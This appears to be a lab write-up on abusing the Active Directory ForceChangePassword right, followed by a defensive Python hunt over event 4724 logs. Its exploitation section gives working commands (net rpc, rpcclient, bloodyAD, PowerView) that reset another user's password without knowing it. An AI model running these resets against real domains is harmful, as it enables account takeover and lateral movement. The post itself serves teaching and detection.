In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the ForceChangePassword permission in Active Directory environments. This permission is especially dangerous when it is held over privileged accounts, as it enables lateral movement and unauthorized access across systems by impersonating the compromised account. The lab setup needed to simulate these attacks is outlined, with the methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activity linked to ForceChangePassword abuse are also covered, alongside actionable recommendations for mitigating this weakness. This overview equips security professionals with the insight needed to recognize and defend against this common misconfiguration.
Table of Contents
Abusing AD-DACL – ForceChangePassword
ForceChangePassword Right
Prerequisites
Lab Setup – User Owns ForceChangePassword Rights
Exploitation – User Owns ForceChangePassword Rights
Bloodhound – Hunting for Weak Permission
Method for Exploitation – Change Password (T1110.001)
- Linux Net RPC – Samba
- Linux Net RPC – Rpcclient
- Linux – BloodyAD
- Windows PowerShell – PowerView
Detection & Mitigation
ForceChangePassword Right
This permission grants the right to change the password of a user account without knowing its current password. The abuse is possible when the attacker controls an object that holds GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.
Prerequisites
- Windows Server 2019 as Active Directory
- Kali Linux
- Tools: Bloodhound, Net RPC, Powerview, BloodyAD
- Windows 10/11 – As Client
Lab Setup – User Owns ForceChangePassword Rights
In this lab setup we will create two users, Raj and Aarti, and assign the Raj user "Reset Password" rights over the Aarti user.
1. Create the AD Environment:
To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) from which you can run enumeration and exploitation tools.
- Domain Controller:
- Install Windows Server (2016 or 2019 recommended).
- Promote it to a Domain Controller by adding the Active Directory Domain Services role.
- Set up the domain (e.g., ignite.local).
- User Accounts:
- Create two AD user accounts named Raj and Aarti.
net user raj Password@1 /add /domain
net user aarti Password@1 /add /domain
2. Assign the "ForceChangePassword" Privilege to Raj for the Aarti User:
Once your AD environment is set up, you need to assign the "ForceChangePassword" right to Raj over the Aarti user.
- Steps:
- Open Active Directory Users and Computers (ADUC) on the Domain Controller.
- Enable the Advanced Features view by clicking View > Advanced Features.
- Locate the user Aarti in the Users container.
- Right-click the Aarti user and go to Properties.
- Go to the Security tab and click the Add button.
- In the "Enter the object name to select" box, type Raj and click Check Names.
- In the Permissions section, check the box for the Reset Password permission.
- Apply the settings.
At this point Raj has Reset Password rights over the Aarti user, meaning Raj can change the password of Aarti's account without knowing its current password.
Exploitation
Bloodhound – Hunting for Weak Permission
Use BloodHound to confirm privileges: you can use BloodHound to verify that Raj holds ForceChangePassword rights over the Aarti user.
bloodhound-python -u raj -p Password@1 -ns 192.168.1.8 -d ignite.local -c All
In the BloodHound graph, the tester selects the Raj user node and inspects its Outbound Object Control, where the First Degree Object Control count is 1. Expanding that control shows that the Raj user has the ForceChangePassword privilege over the Aarti user.
Method for Exploitation – Change Password (T1110.001)
The tester can abuse this permission by changing the password of the Aarti user without knowing its current password.
1. Linux Net RPC – Samba
This can be done from a UNIX-like system with net, a tool for the administration of Samba and CIFS/SMB clients.
net rpc password aarti 'Password@987' -U ignite.local/raj%'Password@1' -S 192.168.1.8
2. Linux Net RPC – Rpcclient
rpcclient can also be used on UNIX-like systems when the samba-common-bin package is missing.
rpcclient -U ignite.local/raj 192.168.1.8
setuserinfo aarti 23 Password@987
3. Linux – BloodyAD
Alternatively, the same reset can be performed with bloodyAD.
bloodyAD --host "192.168.1.8" -d "ignite.local" -u "raj" -p "Password@1" set password "aarti" "Password@987"
4. Windows PowerShell – PowerView
The attacker can change the user's password with the PowerView module, using the Set-DomainUserPassword cmdlet.
powershell -ep bypass
Import-Module .\PowerView.ps1
$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force
Set-DomainUserPassword -Identity 'aarti' -AccountPassword $NewPassword
Detection & Mitigation
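Every method above performs an administrative password reset rather than a user-initiated change, and a domain controller records such resets as Security event 4724 (event 4723 is a user changing their own password). As an added example that is not part of the original post, the following Python hunts a constructed export of those events for resets performed by principals outside an expected set and escalates any reset of a privileged target; the key=value export format, the helpdesk01 account and the privileged-target list are assumptions.

```python
"""Hunt Windows Security event 4724 (administrative password reset) for
resets by principals that are not expected to hold ForceChangePassword."""
import re
from dataclasses import dataclass

# Constructed sample log lines, modelled on the fields of event 4724/4723 as a
# flattened key=value SIEM export might present them (hypothetical format).
SAMPLE_LOG = """\
EventID=4724 TimeCreated=2024-05-01T10:02:11Z SubjectUserName=helpdesk01 SubjectDomainName=IGNITE TargetUserName=bob TargetDomainName=IGNITE
EventID=4724 TimeCreated=2024-05-01T10:07:45Z SubjectUserName=raj SubjectDomainName=IGNITE TargetUserName=aarti TargetDomainName=IGNITE
EventID=4723 TimeCreated=2024-05-01T10:09:00Z SubjectUserName=aarti SubjectDomainName=IGNITE TargetUserName=aarti TargetDomainName=IGNITE
EventID=4724 TimeCreated=2024-05-01T10:15:30Z SubjectUserName=raj SubjectDomainName=IGNITE TargetUserName=administrator TargetDomainName=IGNITE
"""

# Assumption: only this helpdesk account legitimately resets other users' passwords.
EXPECTED_RESETTERS = {"helpdesk01"}
# Assumption: resets of these accounts are always escalated, whoever performed them.
PRIVILEGED_TARGETS = {"administrator"}

FIELD_RE = re.compile(r"(\w+)=(\S+)")


@dataclass
class Finding:
    time: str
    subject: str   # account that performed the reset (SubjectUserName)
    target: str    # account whose password was reset (TargetUserName)
    severity: str


def parse_event(line):
    """Split one key=value log line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def hunt_password_resets(log_text):
    """Return a Finding for every 4724 reset that is unexpected or touches a privileged account."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4724":      # 4723 = self-service change, not a reset
            continue
        subject = ev["SubjectUserName"].lower()
        target = ev["TargetUserName"].lower()
        if target in PRIVILEGED_TARGETS:
            findings.append(Finding(ev["TimeCreated"], subject, target, "high"))
        elif subject not in EXPECTED_RESETTERS:
            findings.append(Finding(ev["TimeCreated"], subject, target, "medium"))
    return findings
```

Pairing each finding with the BloodHound ForceChangePassword edges found earlier tells you whether the reset was exercised through an ACE that should not exist.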